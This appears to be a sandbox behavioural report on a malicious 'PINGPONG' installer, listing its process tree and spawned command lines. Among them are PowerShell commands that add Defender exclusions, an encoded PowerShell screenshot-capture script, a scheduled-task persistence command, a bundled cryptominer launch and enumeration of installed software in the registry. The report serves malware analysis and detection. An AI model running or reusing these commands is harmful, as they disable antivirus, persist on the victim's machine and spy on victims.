PID 1572 wrote to memory of 3084 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\installer.exe
PID 1572 wrote to memory of 3084 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\installer.exe
PID 3084 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\installer.exe C:\Windows\SysWOW64\cmd.exe
PID 3084 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\installer.exe C:\Windows\SysWOW64\cmd.exe
PID 3084 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\installer.exe C:\Windows\SysWOW64\cmd.exe
PID 4216 wrote to memory of 388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4216 wrote to memory of 388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4216 wrote to memory of 388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4216 wrote to memory of 1904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 4216 wrote to memory of 1904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 4216 wrote to memory of 1904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 5112 wrote to memory of 4204 N/A C:\ProgramData\rundll32.exe C:\Users\Admin\AppData\Local\Temp\temporary3213340838\temp.bin
PID 5112 wrote to memory of 4204 N/A C:\ProgramData\rundll32.exe C:\Users\Admin\AppData\Local\Temp\temporary3213340838\temp.bin
PID 4204 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\temporary3213340838\temp.bin C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4204 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\temporary3213340838\temp.bin C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4204 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\temporary3213340838\temp.bin C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4204 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\temporary3213340838\temp.bin C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4204 wrote to memory of 1152 N/A C:\Users\Admin\AppData\Local\Temp\temporary3213340838\temp.bin C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4204 wrote to memory of 1152 N/A C:\Users\Admin\AppData\Local\Temp\temporary3213340838\temp.bin C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4204 wrote to memory of 4936 N/A C:\Users\Admin\AppData\Local\Temp\temporary3213340838\temp.bin C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4204 wrote to memory of 4936 N/A C:\Users\Admin\AppData\Local\Temp\temporary3213340838\temp.bin C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4584 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe C:\Users\Admin\AppData\Local\Programs\PINGPONG\resources\resources\miner-win32-x64.exe
PID 4584 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe C:\Users\Admin\AppData\Local\Programs\PINGPONG\resources\resources\miner-win32-x64.exe
PID 4584 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe
PID 4584 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe
PID 4584 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe
PID 4584 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe
PID 4584 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe
PID 4584 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe
PID 4584 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe
PID 4584 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe
PID 4584 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe
PID 4584 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe
PID 4584 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe
PID 4584 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe
PID 4584 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe
PID 4584 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe
PID 4584 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe
PID 4584 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe
PID 4584 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe
PID 4584 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe
PID 4584 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe
PID 4584 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe
PID 4584 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe
PID 4584 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe

"C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe"

C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe

"C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath \"C:\ProgramData\""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\ProgramData\rundll32.exe"

C:\ProgramData\rundll32.exe

C:\ProgramData\rundll32.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qexdazho\qexdazho.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB391.tmp" "c:\Users\Admin\AppData\Local\Temp\qexdazho\CSC7B5FDE6EF5AA4059A6EF19F80326384.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\installer.exe"

C:\Users\Admin\AppData\Local\Temp\installer.exe

C:\Users\Admin\AppData\Local\Temp\installer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath \"C:\\\""

C:\Windows\SysWOW64\cmd.exe

cmd /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq PINGPONG.exe" | %SYSTEMROOT%\System32\find.exe "PINGPONG.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist /FI "USERNAME eq Admin" /FI "IMAGENAME eq PINGPONG.exe"

C:\Windows\SysWOW64\find.exe

C:\Windows\System32\find.exe "PINGPONG.exe"

C:\Users\Admin\AppData\Local\Temp\temporary3213340838\temp.bin

C:\Users\Admin\AppData\Local\Temp\temporary3213340838\temp.bin

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\temporary3213340838\temp.bin'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'temp.bin'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\rundll64.exe'

C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe

"C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'rundll64.exe'

C:\Users\Admin\AppData\Local\Programs\PINGPONG\resources\resources\miner-win32-x64.exe

C:\Users\Admin\AppData\Local\Programs\PINGPONG\resources\resources\miner-win32-x64.exe --config C:\Users\Admin\AppData\Roaming\PINGPONG\miner_config.json --socket \\.\pipe\PINGPONG

C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe

"C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\PINGPONG" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1620 --field-trial-handle=1720,i,734028901510129317,13111959226977282764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe

"C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\PINGPONG" --mojo-platform-channel-handle=1800 --field-trial-handle=1720,i,734028901510129317,13111959226977282764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "rundll64" /tr "C:\Users\Admin\AppData\Local\rundll64.exe"

C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe

"C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\PINGPONG" --app-path="C:\Users\Admin\AppData\Local\Programs\PINGPONG\resources\app.asar" --enable-sandbox --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2600 --field-trial-handle=1720,i,734028901510129317,13111959226977282764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 124.0.2 (x64 en-US)"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data

C:\Windows\system32\reg.exe

